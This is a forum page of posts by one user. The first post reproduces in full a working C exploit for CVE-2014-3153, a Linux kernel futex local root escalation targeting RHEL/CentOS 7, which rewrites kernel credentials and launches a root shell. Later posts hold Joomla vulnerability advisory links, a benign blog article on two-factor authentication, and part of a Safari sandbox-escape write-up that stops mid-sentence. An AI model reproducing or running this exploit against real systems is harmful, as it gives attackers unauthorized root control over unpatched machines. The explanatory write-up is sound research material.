Jump to content

Nytro

Administrators
  • Posts

    18772
  • Joined

  • Last visited

  • Days Won

    729

Everything posted by Nytro

  1. [h=1]Linux Kernel libfutex Local Root for RHEL/CentOS 7.0.1406[/h] /* * CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406 * By Kaiqu Chen ( kaiquchen@163.com ) * Based on libfutex and the expoilt for Android by GeoHot. * * Usage: * $gcc exploit.c -o exploit -lpthread * $./exploit * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <stdbool.h> #include <pthread.h> #include <fcntl.h> #include <signal.h> #include <string.h> #include <errno.h> #include <linux/futex.h> #include <sys/socket.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/resource.h> #include <arpa/inet.h> #include <netinet/in.h> #include <netinet/tcp.h> #define ARRAY_SIZE(a) (sizeof (a) / sizeof (*(a))) #define FUTEX_WAIT_REQUEUE_PI 11 #define FUTEX_CMP_REQUEUE_PI 12 #define USER_PRIO_BASE 120 #define LOCAL_PORT 5551 #define SIGNAL_HACK_KERNEL 12 #define SIGNAL_THREAD_EXIT 10 #define OFFSET_PID 0x4A4 #define OFFSET_REAL_PARENT 0x4B8 #define OFFSET_CRED 0x668 #define SIZEOF_CRED 160 #define SIZEOF_TASK_STRUCT 2912 #define OFFSET_ADDR_LIMIT 0x20 #define PRIO_LIST_OFFSET 8 #define NODE_LIST_OFFSET (PRIO_LIST_OFFSET + sizeof(struct list_head)) #define PRIO_LIST_TO_WAITER(list) (((void *)(list)) - PRIO_LIST_OFFSET) #define WAITER_TO_PRIO_LIST(waiter) (((void *)(waiter)) + PRIO_LIST_OFFSET) #define NODE_LIST_TO_WAITER(list) (((void *)(list)) - NODE_LIST_OFFSET) #define WAITER_TO_NODE_LIST(waiter) (((void *)(waiter)) + NODE_LIST_OFFSET) #define MUTEX_TO_PRIO_LIST(mutex) (((void *)(mutex)) + sizeof(long)) #define MUTEX_TO_NODE_LIST(mutex) (((void *)(mutex)) + sizeof(long) + sizeof(struct list_head)) //////////////////////////////////////////////////////////////////// struct task_struct; struct thread_info { struct task_struct *task; void *exec_domain; int flags; int status; int cpu; int preempt_count; void *addr_limit; }; struct list_head { struct list_head *next; struct list_head *prev; }; struct plist_head { struct list_head node_list; }; struct plist_node { int prio; struct list_head prio_list; struct list_head node_list; }; struct rt_mutex { unsigned long wait_lock; struct plist_head wait_list; struct task_struct *owner; }; struct rt_mutex_waiter { struct plist_node list_entry; struct plist_node pi_list_entry; struct task_struct *task; struct rt_mutex *lock; }; struct mmsghdr { struct msghdr msg_hdr; unsigned int msg_len; }; struct cred { int usage; int uid; /* real UID of the task */ int gid; /* real GID of the task */ int suid; /* saved UID of the task */ int sgid; /* saved GID of the task */ int euid; /* effective UID of the task */ int egid; /* effective GID of the task */ int fsuid; /* UID for VFS ops */ int fsgid; /* GID for VFS ops */ }; //////////////////////////////////////////////////////////////////// static int swag = 0; static int swag2 = 0; static int main_pid; static pid_t waiter_thread_tid; static pthread_mutex_t hacked_lock; static pthread_cond_t hacked; static pthread_mutex_t done_lock; static pthread_cond_t done; static pthread_mutex_t is_thread_desched_lock; static pthread_cond_t is_thread_desched; static volatile int do_socket_tid_read = 0; static volatile int did_socket_tid_read = 0; static volatile int do_dm_tid_read = 0; static volatile int did_dm_tid_read = 0; static pid_t last_tid = 0; static volatile int_sync_time_out = 0; struct thread_info thinfo; char task_struct_buf[sizeOF_TASK_STRUCT]; struct cred cred_buf; struct thread_info *hack_thread_stack = NULL; pthread_t thread_client_to_setup_rt_waiter; int listenfd; int sockfd; int clientfd; //////////////////////////////////////////////////////////////// int gettid() { return syscall(__NR_gettid); } ssize_t read_pipe(void *kbuf, void *ubuf, size_t count) { int pipefd[2]; ssize_t len; pipe(pipefd); len = write(pipefd[1], kbuf, count); if (len != count) { printf("Thread %d failed in reading @ %p : %d %d\n", gettid(), kbuf, (int)len, errno); while(1) { sleep(10); } } read(pipefd[0], ubuf, count); close(pipefd[0]); close(pipefd[1]); return len; } ssize_t write_pipe(void *kbuf, void *ubuf, size_t count) { int pipefd[2]; ssize_t len; pipe(pipefd); write(pipefd[1], ubuf, count); len = read(pipefd[0], kbuf, count); if (len != count) { printf("Thread %d failed in writing @ %p : %d %d\n", gettid(), kbuf, (int)len, errno); while(1) { sleep(10); } } close(pipefd[0]); close(pipefd[1]); return len; } int pthread_cancel_immediately(pthread_t thid) { pthread_kill(thid, SIGNAL_THREAD_EXIT); pthread_join(thid, NULL); return 0; } void set_addr_limit(void *sp) { long newlimit = -1; write_pipe(sp + OFFSET_ADDR_LIMIT, (void *)&newlimit, sizeof(long)); } void set_cred(struct cred *kcred) { struct cred cred_buf; int len; len = read_pipe(kcred, &cred_buf, sizeof(cred_buf)); cred_buf.uid = cred_buf.euid = cred_buf.suid = cred_buf.fsuid = 0; cred_buf.gid = cred_buf.egid = cred_buf.sgid = cred_buf.fsgid = 0; len = write_pipe(kcred, &cred_buf, sizeof(cred_buf)); } struct rt_mutex_waiter *pwaiter11; void set_parent_cred(void *sp, int parent_tid) { int len; int tid; struct task_struct *pparent; struct cred *pcred; set_addr_limit(sp); len = read_pipe(sp, &thinfo, sizeof(thinfo)); if(len != sizeof(thinfo)) { printf("Read %p error %d\n", sp, len); } void *ptask = thinfo.task; len = read_pipe(ptask, task_struct_buf, SIZEOF_TASK_STRUCT); tid = *(int *)(task_struct_buf + OFFSET_PID); while(tid != 0 && tid != parent_tid) { pparent = *(struct task_struct **)(task_struct_buf + OFFSET_REAL_PARENT); len = read_pipe(pparent, task_struct_buf, SIZEOF_TASK_STRUCT); tid = *(int *)(task_struct_buf + OFFSET_PID); } if(tid == parent_tid) { pcred = *(struct cred **)(task_struct_buf + OFFSET_CRED); set_cred(pcred); } else printf("Pid %d not found\n", parent_tid); return; } static int read_voluntary_ctxt_switches(pid_t pid) { char filename[256]; FILE *fp; int vcscnt = -1; sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp) { char filebuf[4096]; char *pdest; fread(filebuf, 1, sizeof filebuf, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); vcscnt = atoi(pdest + 0x19); fclose(fp); } return vcscnt; } static void sync_timeout_task(int sig) { int_sync_time_out = 1; } static int sync_with_child_getchar(pid_t pid, int volatile *do_request, int volatile *did_request) { while (*do_request == 0) { } printf("Press RETURN after one second..."); *did_request = 1; getchar(); return 0; } static int sync_with_child(pid_t pid, int volatile *do_request, int volatile *did_request) { struct sigaction act; int vcscnt; int_sync_time_out = 0; act.sa_handler = sync_timeout_task; sigemptyset(&act.sa_mask); act.sa_flags = 0; act.sa_restorer = NULL; sigaction(SIGALRM, &act, NULL); alarm(3); while (*do_request == 0) { if (int_sync_time_out) return -1; } alarm(0); vcscnt = read_voluntary_ctxt_switches(pid); *did_request = 1; while (read_voluntary_ctxt_switches(pid) != vcscnt + 1) { usleep(10); } return 0; } static void sync_with_parent(int volatile *do_request, int volatile *did_request) { *do_request = 1; while (*did_request == 0) { } } void fix_rt_mutex_waiter_list(struct rt_mutex *pmutex) { struct rt_mutex_waiter *pwaiter6, *pwaiter7; struct rt_mutex_waiter waiter6, waiter7; struct rt_mutex mutex; if(!pmutex) return; read_pipe(pmutex, &mutex, sizeof(mutex)); pwaiter6 = NODE_LIST_TO_WAITER(mutex.wait_list.node_list.next); if(!pwaiter6) return; read_pipe(pwaiter6, &waiter6, sizeof(waiter6)); pwaiter7 = NODE_LIST_TO_WAITER(waiter6.list_entry.node_list.next); if(!pwaiter7) return; read_pipe(pwaiter7, &waiter7, sizeof(waiter7)); waiter6.list_entry.prio_list.prev = waiter6.list_entry.prio_list.next; waiter7.list_entry.prio_list.next = waiter7.list_entry.prio_list.prev; mutex.wait_list.node_list.prev = waiter6.list_entry.node_list.next; waiter7.list_entry.node_list.next = waiter6.list_entry.node_list.prev; write_pipe(pmutex, &mutex, sizeof(mutex)); write_pipe(pwaiter6, &waiter6, sizeof(waiter6)); write_pipe(pwaiter7, &waiter7, sizeof(waiter7)); } static void void_handler(int signum) { pthread_exit(0); } static void kernel_hack_task(int signum) { struct rt_mutex *prt_mutex, rt_mutex; struct rt_mutex_waiter rt_waiter11; int tid = syscall(__NR_gettid); int pid = getpid(); set_parent_cred(hack_thread_stack, main_pid); read_pipe(pwaiter11, (void *)&rt_waiter11, sizeof(rt_waiter11)); prt_mutex = rt_waiter11.lock; read_pipe(prt_mutex, (void *)&rt_mutex, sizeof(rt_mutex)); void *ptask_struct = rt_mutex.owner; ptask_struct = (void *)((long)ptask_struct & ~ 0xF); int len = read_pipe(ptask_struct, task_struct_buf, SIZEOF_TASK_STRUCT); int *ppid = (int *)(task_struct_buf + OFFSET_PID); void **pstack = (void **)&task_struct_buf[8]; void *owner_sp = *pstack; set_addr_limit(owner_sp); pthread_mutex_lock(&hacked_lock); pthread_cond_signal(&hacked); pthread_mutex_unlock(&hacked_lock); } static void *call_futex_lock_pi_with_priority(void *arg) { int prio; struct sigaction act; int ret; prio = (long)arg; last_tid = syscall(__NR_gettid); pthread_mutex_lock(&is_thread_desched_lock); pthread_cond_signal(&is_thread_desched); act.sa_handler = void_handler; sigemptyset(&act.sa_mask); act.sa_flags = 0; act.sa_restorer = NULL; sigaction(SIGNAL_THREAD_EXIT, &act, NULL); act.sa_handler = kernel_hack_task; sigemptyset(&act.sa_mask); act.sa_flags = 0; act.sa_restorer = NULL; sigaction(SIGNAL_HACK_KERNEL, &act, NULL); setpriority(PRIO_PROCESS, 0, prio); pthread_mutex_unlock(&is_thread_desched_lock); sync_with_parent(&do_dm_tid_read, &did_dm_tid_read); ret = syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0); return NULL; } static pthread_t create_thread_do_futex_lock_pi_with_priority(int prio) { pthread_t th4; pid_t pid; do_dm_tid_read = 0; did_dm_tid_read = 0; pthread_mutex_lock(&is_thread_desched_lock); pthread_create(&th4, 0, call_futex_lock_pi_with_priority, (void *)(long)prio); pthread_cond_wait(&is_thread_desched, &is_thread_desched_lock); pid = last_tid; sync_with_child(pid, &do_dm_tid_read, &did_dm_tid_read); pthread_mutex_unlock(&is_thread_desched_lock); return th4; } static int server_for_setup_rt_waiter(void) { int sockfd; int yes = 1; struct sockaddr_in addr = {0}; sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP); setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes)); addr.sin_family = AF_INET; addr.sin_port = htons(LOCAL_PORT); addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)); listen(sockfd, 1); listenfd = sockfd; return accept(sockfd, NULL, NULL); } static int connect_server_socket(void) { int sockfd; struct sockaddr_in addr = {0}; int ret; int sock_buf_size; sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP); if (sockfd < 0) { printf("socket failed\n"); usleep(10); } else { addr.sin_family = AF_INET; addr.sin_port = htons(LOCAL_PORT); addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); } while (connect(sockfd, (struct sockaddr *)&addr, 16) < 0) { usleep(10); } sock_buf_size = 1; setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size)); return sockfd; } unsigned long iov_base0, iov_basex; size_t iov_len0, iov_lenx; static void *client_to_setup_rt_waiter(void *waiter_plist) { int sockfd; struct mmsghdr msgvec[1]; struct iovec msg_iov[8]; unsigned long databuf[0x20]; int i; int ret; struct sigaction act; act.sa_handler = void_handler; sigemptyset(&act.sa_mask); act.sa_flags = 0; act.sa_restorer = NULL; sigaction(SIGNAL_THREAD_EXIT, &act, NULL); waiter_thread_tid = syscall(__NR_gettid); setpriority(PRIO_PROCESS, 0, 12); sockfd = connect_server_socket(); clientfd = sockfd; for (i = 0; i < ARRAY_SIZE(databuf); i++) { databuf = (unsigned long)waiter_plist; } for (i = 0; i < ARRAY_SIZE(msg_iov); i++) { msg_iov.iov_base = waiter_plist; msg_iov.iov_len = (long)waiter_plist; } msg_iov[1].iov_base = (void *)iov_base0; msgvec[0].msg_hdr.msg_name = databuf; msgvec[0].msg_hdr.msg_namelen = sizeof databuf; msgvec[0].msg_hdr.msg_iov = msg_iov; msgvec[0].msg_hdr.msg_iovlen = ARRAY_SIZE(msg_iov); msgvec[0].msg_hdr.msg_control = databuf; msgvec[0].msg_hdr.msg_controllen = ARRAY_SIZE(databuf); msgvec[0].msg_hdr.msg_flags = 0; msgvec[0].msg_len = 0; syscall(__NR_futex, &swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &swag2, 0); sync_with_parent(&do_socket_tid_read, &did_socket_tid_read); ret = 0; while (1) { ret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0); if (ret <= 0) { break; } else printf("sendmmsg ret %d\n", ret); } return NULL; } static void plist_set_next(struct list_head *node, struct list_head *head) { node->next = head; head->prev = node; node->prev = head; head->next = node; } static void setup_waiter_params(struct rt_mutex_waiter *rt_waiters) { rt_waiters[0].list_entry.prio = USER_PRIO_BASE + 9; rt_waiters[1].list_entry.prio = USER_PRIO_BASE + 13; plist_set_next(&rt_waiters[0].list_entry.prio_list, &rt_waiters[1].list_entry.prio_list); plist_set_next(&rt_waiters[0].list_entry.node_list, &rt_waiters[1].list_entry.node_list); } static bool do_exploit(void *waiter_plist) { void *magicval, *magicval2; struct rt_mutex_waiter *rt_waiters; pid_t pid; pid_t pid6, pid7, pid12, pid11; rt_waiters = PRIO_LIST_TO_WAITER(waiter_plist); syscall(__NR_futex, &swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0); while (syscall(__NR_futex, &swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag) != 1) { usleep(10); } pthread_t th6 = create_thread_do_futex_lock_pi_with_priority(6); pthread_t th7 = create_thread_do_futex_lock_pi_with_priority(7); swag2 = 0; do_socket_tid_read = 0; did_socket_tid_read = 0; syscall(__NR_futex, &swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &swag2, swag2); if (sync_with_child_getchar(waiter_thread_tid, &do_socket_tid_read, &did_socket_tid_read) < 0) { return false; } setup_waiter_params(rt_waiters); magicval = rt_waiters[0].list_entry.prio_list.next; printf("Checking whether exploitable.."); pthread_t th11 = create_thread_do_futex_lock_pi_with_priority(11); if (rt_waiters[0].list_entry.prio_list.next == magicval) { printf("failed\n"); return false; } printf("OK\nSeaching good magic...\n"); magicval = rt_waiters[0].list_entry.prio_list.next; pthread_cancel_immediately(th11); pthread_t th11_1, th11_2; while(1) { setup_waiter_params(rt_waiters); th11_1 = create_thread_do_futex_lock_pi_with_priority(11); magicval = rt_waiters[0].list_entry.prio_list.next; hack_thread_stack = (struct thread_info *)((unsigned long)magicval & 0xffffffffffffe000); rt_waiters[1].list_entry.node_list.prev = (void *)&hack_thread_stack->addr_limit; th11_2 = create_thread_do_futex_lock_pi_with_priority(11); magicval2 = rt_waiters[1].list_entry.node_list.prev; printf("magic1=%p magic2=%p\n", magicval, magicval2); if(magicval < magicval2) { printf("Good magic found\nHacking...\n"); break; } else { pthread_cancel_immediately(th11_1); pthread_cancel_immediately(th11_2); } } pwaiter11 = NODE_LIST_TO_WAITER(magicval2); pthread_mutex_lock(&hacked_lock); pthread_kill(th11_1, SIGNAL_HACK_KERNEL); pthread_cond_wait(&hacked, &hacked_lock); pthread_mutex_unlock(&hacked_lock); close(listenfd); struct rt_mutex_waiter waiter11; struct rt_mutex *pmutex; int len = read_pipe(pwaiter11, &waiter11, sizeof(waiter11)); if(len != sizeof(waiter11)) { pmutex = NULL; } else { pmutex = waiter11.lock; } fix_rt_mutex_waiter_list(pmutex); pthread_cancel_immediately(th11_1); pthread_cancel_immediately(th11_2); pthread_cancel_immediately(th7); pthread_cancel_immediately(th6); close(clientfd); pthread_cancel_immediately(thread_client_to_setup_rt_waiter); exit(0); } #define MMAP_ADDR_BASE 0x0c000000 #define MMAP_LEN 0x0c001000 int main(int argc, char *argv[]) { unsigned long mapped_address; void *waiter_plist; printf("CVE-2014-3153 exploit by Chen Kaiqu(kaiquchen@163.com)\n"); main_pid = gettid(); if(fork() == 0) { iov_base0 = (unsigned long)mmap((void *)0xb0000000, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, /*MAP_POPULATE |*/ MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0); if (iov_base0 < 0xb0000000) { printf("mmap failed?\n"); return 1; } iov_len0 = 0x10000; iov_basex = (unsigned long)mmap((void *)MMAP_ADDR_BASE, MMAP_LEN, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0); if (iov_basex < MMAP_ADDR_BASE) { printf("mmap failed?\n"); return 1; } iov_lenx = MMAP_LEN; waiter_plist = (void *)iov_basex + 0x400; pthread_create(&thread_client_to_setup_rt_waiter, NULL, client_to_setup_rt_waiter, waiter_plist); sockfd = server_for_setup_rt_waiter(); if (sockfd < 0) { printf("Server failed\n"); return 1; } if (!do_exploit(waiter_plist)) { return 1; } return 0; } while(getuid()) usleep(100); execl("/bin/bash", "bin/bash", NULL); return 0; } Sursa: http://www.exploit-db.com/exploits/35370/
  2. Adu cateva argumente. http://threatpost.com/joomla-fixes-critical-sql-injection-vulnerability/104717 http://developer.joomla.org/security/578-20140301-core-sql-injection.html http://www.exploit-db.com/exploits/31459/ http://chingshiong.blogspot.ro/2012/04/joomla-cms-251-blind-sql-injection.html http://developer.joomla.org/security/580-20140303-core-xss-vulnerability.html http://developer.joomla.org/security/570-core-xss-20131101.html http://developer.joomla.org/security/593-20140901-core-xss-vulnerability.html http://www.securityfocus.com/archive/1/527765/30/0/threaded
  3. What is Two-Factor Authentication? Where Should You Use It? June 9, 2014 Brian Donohue We’ve recorded podcasts about it. We’ve discussed it at length in a number of screencasts (which I have kindly embedded below). We’ve mentioned it indirectly in countless articles. But we’ve never taken the time to dedicate an article solely to explaining what two-factor authentication is, how it works, and where you should use it. What is Two-Factor Authentication? Two-factor authentication is a feature offered by a number of online service providers that adds an additional layer of security to the account login process by requiring that a user provide two forms of authentication. The first form – in general – is your password. The second factor can be any number of things. Perhaps the most popular second factor of authentication is the SMS or email code. The general theory behind two-factor is that, in order to log in, you must know something and possess something. Thus, in order to access your company’s virtual private network, you might need a password and a USB stick. Two-factor is no panacea to prevent account hijacks, but it’s a formidable barrier to anything that would try to compromise an account protected by it. Two-factor is no panacea to prevent account hijacks, but it’s a formidable barrier to anything that would try to compromise an account protected by it. I think it is pretty well known that passwords are severely flawed: weak ones are easy to remember and easy to guess; strong ones are hard to guess but hard to remember. Because of this, people who are already bad at creating passwords, use the same ones over and over again. Two-factor at least makes it so an attacker would have to figure out your password and have access to your second factor, which would generally mean stealing your cell phone or compromising your email account. What is two-factor authentication and where should you enable it? #security #passwords Tweet There’s been a race to replace passwords, but nothing has emerged. As it stands, a good two-factor authentication system is about the best protection you can have. The second benefit to two-factor authentication systems, especially the ones that involve the reception of email and SMS passcodes, is that they let you know when someone has guessed your password. As I’ve said probably 1000 times, if you receive a two-factor authentication code on your mobile device or in your email account and you weren’t trying to login to the account associated with it, that’s a pretty good sign that someone has guessed your password and is attempting to hijack your account. When or if this ever happens, it’s probably a good time to go ahead and change your password. On What Accounts Should I Enable Two-Factor? The simple rule regarding when and where you should enable two-factor is this: If the service in question offers it and you deem that account valuable, then enable it. So, Pinterest? I don’t know. Maybe. If I had a Pinterest account I probably wouldn’t be willing to go through the hassle of entering two authenticators every time I go to log in. However, your online banking, primary and secondary email (especially if you have a dedicated account recovery email address), valued social networks (Facebook and Twitter perhaps), and definitely your AppleID or iCloud or whatever account controls your Android device, if you have one, should all be protected by a second factor of authentication. Watch this video demonstrating how to set up two-factor for iCloud Obviously you would want to consider requiring that second factor for any work-related accounts as well. If you manage websites, you’ll want to consider locking down your registration service account, whether it’s WordPress or GoDaddy or NameCheap or some other. We also recommend turning it on for any account that may have a credit or debit card associated with it: PayPal, eBay, eTrade, etc. Again, your decision to turn on two-factor should be based on how devastating it would be to lose access to any account that offers the feature. This video demonstrates how to set up two-factor on Facebook Are There Any Other Forms of Two-Factor? Thus far, we have discussed two-factor as a code sent to your mobile device or email account and as a USB stick often used for VPN access along with a password. There are also keychain code generators, like RSA’s SecureID, which are generally used in corporate environments. At this point, these are the predominate forms of two-factor. However, there are certainly others as well. Transaction authentication numbers (TAN) are a bit of an old fashioned second factor form. They were popular in Europe, and I have never actually used one myself, but if I understand correctly, your bank would send you a list of TANs (on paper) and every time you performed a transaction online you would enter one of those TANs to authenticate it. The ATM is another old-school example of two-factor authentication. The thing you know if your PIN; the thing you possess is your debit card. From paper to the future, there has been much buzz about biometric two-factor. Some systems require a password and a fingerprint, iris scan, heartbeat, or some other biological measure. Wearables are gaining momentum too. Some systems require you to wear a special bracelet or other accessory with some sort of embedded radio frequency chip. I have read research papers about electromagnetic tattoos that could be used for a second factor of authentication. Both Google and Facebook have mobile application code generators, which let users create their own one-time password in place of an SMS or email code. This video demonstrates how to set up two-factor on Gmail Sursa: What is Two-Factor Authentication? Where Should You Use It? | Kaspersky Lab Official Blog
  4. pwn4fun Spring 2014 - Safari - Part II Posted by Ian Beer TL;DR An OS X GPU driver trusted a user-supplied kernel C++ object pointer and called a virtual function. The IOKit registry contained kernel pointers which were used defeat kASLR. A kernel ROP payload ran Calculator.app as root using a convenient kernel API. Overview of part I We finished part I with the ability to load our own native library into the Safari renderer process on OS X by exploiting an integer truncation bug in the Safari javascript engine. Here in part II we’ll take a look at how sandboxing works on OS X, revise some OS X fundamentals and then exploit two kernel bugs to launch Calculator.app running as root from inside the Safari sandbox. Safari process model Safari’s sandboxing model is based on privilege separation. It uses the WebKit2 framework to communicate between multiple separate processes which collectively form the Safari browser. Each of these processes is responsible for a different part of the browser and sandboxed to only allow access to the system resources it requires. Specifically Safari is split into four distinct process families: WebProcesses are the renderers - they’re responsible for actually drawing web pages as well as dealing with most active web content such as javascript NetworkProcess is the process which talks to the network PluginProcesses are the processes which host native plugins like Adobe Flash UIProcess is the unsandboxed parent of all the other processes and is responsible for coordinating the activity of the sandboxed processes such that a webpage is actually displayed to the user which they can interact with The Web, Network and Plugin process families are sandboxed. In order to understand how to break out of the WebProcess that we find ourselves in we’ve first got to understand how this sandbox is implemented. OS X sandboxing primitives OS X uses the Mandatory Access Control (MAC) paradigm to implement sandboxing, specifically it uses the TrustedBSD framework. Use of the MAC sandboxing paradigm implies that whenever a sandboxed process tries to acquire access to some system resource, for example by opening a file or creating a network socket, the OS will first check: Does this particular process have the right to do this? An implementation of sandboxing using TrustedBSD has two parts: firstly, hooks must be added to the kernel code wherever a sandboxing decision is required. A TrustedBSD hook looks like this: [FONT=Courier New]/* bsd/kern/uipc_syscalls.c */[/FONT] [FONT=Courier New]int socket(struct proc *p, struct socket_args *uap, int32_t *retval)[/FONT] [FONT=Courier New]{[/FONT] [FONT=Courier New]#if CONFIG_MACF_SOCKET_SUBSET[/FONT] [FONT=Courier New][I]if ((error = mac_socket_check_create(kauth_cred_get(), uap->domain,[/I][/FONT] [FONT=Courier New][I] uap->type, uap->protocol)) != 0)[/I][/FONT] [FONT=Courier New][I]return (error);[/I][/FONT] [FONT=Courier New]#endif /* MAC_SOCKET_SUBSET */[/FONT] [FONT=Courier New]...[/FONT] That snippet of code is from the implementation of the socket syscall on OS X. If MAC support has been enabled at compile time then the very first thing the socket syscall implementation will do is call mac_socket_check_create, passing the credentials of the calling processes and the domain, type and protocol of the requested socket: [FONT=Courier New]/* security/mac_socket.h */[/FONT] [FONT=Courier New]int mac_socket_check_create(kauth_cred_t cred, int domain, int type, int protocol)[/FONT] [FONT=Courier New]{[/FONT] [FONT=Courier New]int error;[/FONT] [FONT=Courier New]if (!mac_socket_enforce)[/FONT] [FONT=Courier New]return 0;[/FONT] [FONT=Courier New]MAC_CHECK(socket_check_create, cred, domain, type, protocol);[/FONT] [FONT=Courier New]return (error);[/FONT] [FONT=Courier New]}[/FONT] Here we see that if the enforcement of MAC on sockets hasn’t been globally disabled (mac_socket_enforce is a variable exposed by the sysctl interface) then this function falls through to the MAC_CHECKmacro: [FONT=Courier New]/* security/mac_internal.h */[/FONT] [FONT=Courier New]#defineMAC_CHECK(check, args...) do { \[/FONT] [FONT=Courier New]for (i = 0; i < mac_policy_list.staticmax; i++) { \[/FONT] [FONT=Courier New]mpc = mac_policy_list.entries[i].mpc; \[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New]if (mpc->mpc_ops->mpo_ ## check != NULL) \[/FONT] [FONT=Courier New]error = mac_error_select( \[/FONT] [FONT=Courier New]mpc->mpc_ops->mpo_ ## check (args), \[/FONT] [FONT=Courier New] error);[/FONT] This macro is the core of TrustedBSD. mac_policy_list.entries (the first highlighted chunk) is a list of policies and the second highlighted chuck is TrustedBSD consulting the policy. In actual fact a policy is nothing more than a C struct (struct policy_ops) containing function pointers (one per hook type) and consultation of a policy simply means calling the right function pointer in that struct. If that policy function returns 0 (or isn’t implemented at all by the policy) then the MAC check succeeds. If the policy function returns a non-zero value then the MAC check fails and, in the case of this socket hook, the syscall will fail passing the error code back up to userspace and the rest of the socket syscall won’t be executed. The second part of an implementation of sandboxing using TrustedBSD is the provision of these policy modules. Although TrustedBSD allows multiple policy modules to be present at the same time in practice on OS X there’s only one and it’s implemented in its own kernel extension: Sandbox.kext. When it's loaded Sandbox.kext registers itself as a policy with TrustedBSD by passing a pointer to its policy_ops structure. TrustedBSD adds this to the mac_policy_list.entries array seen earlier and will then call into Sandbox.kext whenever a sandboxing decision is required. Sandbox.kext and the OS X sandbox policy_ops This paper from Dionysus Blazakis, this talk from Meder Kydyraliev and this reference from @osxreverser go into great detail about Sandbox.kext and its operation and usage. Summarizing those linked resources, every process can have a unique sandbox profile. For (almost) every MAC hook type Sandbox.kext allows a sandbox profile to specify a decision tree to be used to determine whether the MAC check should pass or fail. This decision tree is expressed in a simple scheme-like DSL built from tuples of actions, operations and filters (for a more complete guide to the syntax refer to the linked docs): (action operation filter) Actions determine whether a particular rule corresponds to passing or failing the MAC check. Actions are the literals allow and deny. Operations define which MAC hooks this rule applies to. For example the file-read operation allows restricting read access to files. Filters allow a more granular application of operations, for example a filter applied to the file-read operation could define a specific file which is or isn’t allowed. Here’s a snippet from the WebProcess sandbox profile to illustrate that: [FONT=Courier New](deny default (with partial-symbolication))[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New](allow file-read*[/FONT] [FONT=Courier New] ;; Basic system paths[/FONT] [FONT=Courier New] (subpath "/Library/Dictionaries")[/FONT] [FONT=Courier New] (subpath "/Library/Fonts")[/FONT] [FONT=Courier New] (subpath "/Library/Frameworks")[/FONT] [FONT=Courier New] (subpath "/Library/Managed Preferences")[/FONT] [FONT=Courier New] (subpath "/Library/Speech/Synthesizers")[/FONT] [FONT=Courier New] (regex #"^/private/etc/(hosts|group|passwd)$")[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New])[/FONT] As you can see sandbox profiles are very readable on OS X. It’s usually quite clear what any particular sandbox profile allows and denies. In this example the profile is using regular expressions to define allowed file paths (there’s a small regex matching engine in the kernel in AppleMatch.kext.) Sandbox.kext also has a mechanism which allows userspace programs to ask for policy decisions. The main use of this is to restrict access to system IPC services, access to which isn’t mediated by the kernel (so there’s nowhere to put a MAC hook) but by the userspace daemon launchd. Enumerating the attack surface of a sandboxed process Broadly speaking there are two aspects to consider when enumerating the attack surface reachable from within a particular sandbox on OS X: Actions which are specifically allowed by the sandbox policy - these are easy to enumerate by looking at the sandbox policy files. Those actions which are allowed because either because the Sandbox.kext policy_ops doesn’t implement the hook callback or because there’s no hook in place at all. The Safari WebProcess sandbox profile is located here: /System/Library/StagedFrameworks/Safari/WebKit.framework/Versions/A/Resources/com.apple.WebProcess.sb This profile uses an import statement to load the contents of /System/Library/Sandbox/Profiles/system.sb which uses the define statement to declare various broad sandboxing rulesets which define all the rules required to use complete OS X subsystems such as graphics or networking. Amongst others the Webprocess.sb profile uses (system-graphics) which is defined here in system.sb: [FONT=Courier New](define (system-graphics)[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New] (allow iokit-open[/FONT] [FONT=Courier New] (iokit-connection "IOAccelerator")[/FONT] [FONT=Courier New] (iokit-user-client-class "IOAccelerationUserClient")[/FONT] [FONT=Courier New] (iokit-user-client-class "IOSurfaceRootUserClient")[/FONT] [FONT=Courier New] (iokit-user-client-class "IOSurfaceSendRight"))[/FONT] [FONT=Courier New] )[/FONT] [FONT=Courier New])[/FONT] This tells us that the WebProcess sandbox has pretty much unrestricted access to the GPU drivers. In order to understand what the iokit-user-client-class actually means and what this gives us access to we have to step back and take a look at the various parts of OS X involved in the operation of device drivers. OS X kernel fundamentals There are two great books I’d recommend to learn more about the OS X kernel: the older but still relevant “Mac OS X Internals” by Amit Singh and the more recent “Mac OS X and iOS Internals: To the Apple’s Core” by Jonathan Levin. The OS X wikipedia article contains a detailed taxonomic discussion of OS X and its place in the UNIX phylogenetic tree but for our purposes it’s sufficient to divide the OS X kernel into three broad subsystems which collectively are known as XNU: BSD The majority of OS X syscalls are BSD syscalls. The BSD-derived code is responsible for things like file systems and networking. Mach Originally a research microkernel from CMU mach is responsible for many of the low-level idiosyncrasies of OS X. The mach IPC mechanism is one of the most fundamental parts of OS X but the mach kernel code is also responsible for things like virtual memory management. Mach only has a handful of dedicated mach syscalls (mach calls them traps) and almost all of these only exist to support the mach IPC system. All further interaction with the mach kernel subsystems from userspace is via mach IPC. IOKit IOKit is the framework used for writing device drivers on OS X. IOKit code is written in C++ which brings with it a whole host of new bug classes and exploitation possibilities. We'll return to a more detailed discussion of IOKit later. Mach IPC If you want to change the permissions of a memory 